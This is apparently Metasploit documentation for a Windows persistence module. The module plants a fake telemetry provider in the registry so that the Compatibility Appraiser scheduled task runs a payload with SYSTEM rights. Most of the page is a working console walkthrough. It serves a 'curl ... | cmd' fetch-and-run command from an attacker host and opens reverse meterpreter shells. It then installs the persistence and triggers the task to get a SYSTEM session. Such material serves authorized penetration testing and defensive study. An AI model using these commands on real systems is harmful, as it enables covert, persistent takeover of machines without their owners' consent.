metasploit-gs/documentation/modules/exploit/windows/persistence/telemetry.md

## Vulnerable Application

This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on,
when the scheduled task launches, it will execute the telemetry provider and execute our payload
with system permissions.

## Verification Steps

1. Start msfconsole
2. Get an admin level shell on windows
3. Do: `use exploit/windows/persistence/telemetry`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell when the scheduled task runs.

## Options

### PAYLOAD_NAME

Name of payload file to write. Random string as default.

### NAME

Name of the telemetry program. Random string as default.

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

Get an admin level shell

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```

Install persistence

```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set session 1
session => 1
msf exploit(windows/persistence/telemetry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/telemetry) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Appraiser name found: Microsoft Compatibility Appraiser
[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
[+] The target is vulnerable. Registry writable
[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
[*] Using telemetry id: uYmoknDG
[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user)
       or wait till 1/4/2026 4:10:25 AM (SYSTEM)
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc
```

Trigger the scheduled task instead of waiting

```
msf exploit(windows/persistence/telemetry) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2344 created.
Channel 4 created.
Microsoft Windows [Version 10.0.18363.2274]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".

C:\WINDOWS\system32>exit
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/telemetry) > date
[*] exec: date

Sat Jan  3 01:30:05 PM EST 2026
msf exploit(windows/persistence/telemetry) > 
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500

msf exploit(windows/persistence/telemetry) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  WIN10PROLICENSE\windows @ WIN10PROLICENSE  1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN10PROLICENSE      1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2)
```